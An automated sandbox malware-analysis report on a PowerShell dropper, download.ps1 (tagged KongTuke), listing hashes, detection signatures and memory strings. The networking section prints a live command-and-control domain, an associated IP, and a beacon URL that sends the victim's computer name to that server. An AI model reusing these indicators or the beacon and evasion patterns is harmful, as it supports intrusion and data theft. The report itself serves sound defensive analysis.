Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1579457
MD5: f710ad70e1fe42d5174f289867a61f93
SHA1: 5d2c8485c88fef6f88db24094b6b39f1628825a7
SHA256: d9eb14b6a8ce5658354baad69321096594b107cfa096fb7468d8f1c9c02487e5
Tags: KongTuke, ps1, user-monitorsg

Detection

Score: 76 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Sigma matches (process creation event, PID 6884)

Rule author: frack113
Rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Matched event data (identical for both rules):
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
  CommandLine|base64offset|contains: z
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 6884, ProcessName: powershell.exe
  ParentProcessId: 2580 (ParentImage and ParentCommandLine are empty in the event)
Suricata IDS alerts

Timestamp                       | SID     | Severity | Classtype                            | Source IP   | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T13:42:07.577435+0100 | 2859391 | 1        | Domain Observed Used for C2 Detected | 192.168.2.4 | 64577       | 1.1.1.1        | 53               | UDP


AV Detection

Source: download.ps1  Virustotal: Detection: 13%
Source: Submitted Sample  Integrated Neural Analysis Model: Matched 91.4% probability
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: powershell.exe, 00000000.00000002.1896922208.000001A1D8CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8C89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1892984995.000001A1D89A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb: source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbZ source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.1896530930.000001A1D8BCF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Network traffic  Suricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.4:64577 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View  IP Address: 45.61.136.138
Source: global traffic  HTTP traffic detected: GET /jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive
Source: global traffic  HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown  UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic  DNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global traffic  DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1E21000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C2E6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C3002000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0971000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0971000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C0B98000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D09E0000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2212000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/logos/doodle
Source: powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gif
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gifX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B8C8B82
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 0_2_00007FFD9B8C7DD6
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C22FA000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: var e=this||self;var g,h;a:{for(var k=["CLOSURE_FLAGS"],lx3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: WzSw4eoMOAGxg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0X
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1849552252.000001A1C20EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0C69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1880657430.000001A1D0B49000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2gXM0CeB8mUysjW2aKlJz2ym4q6jejH" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script 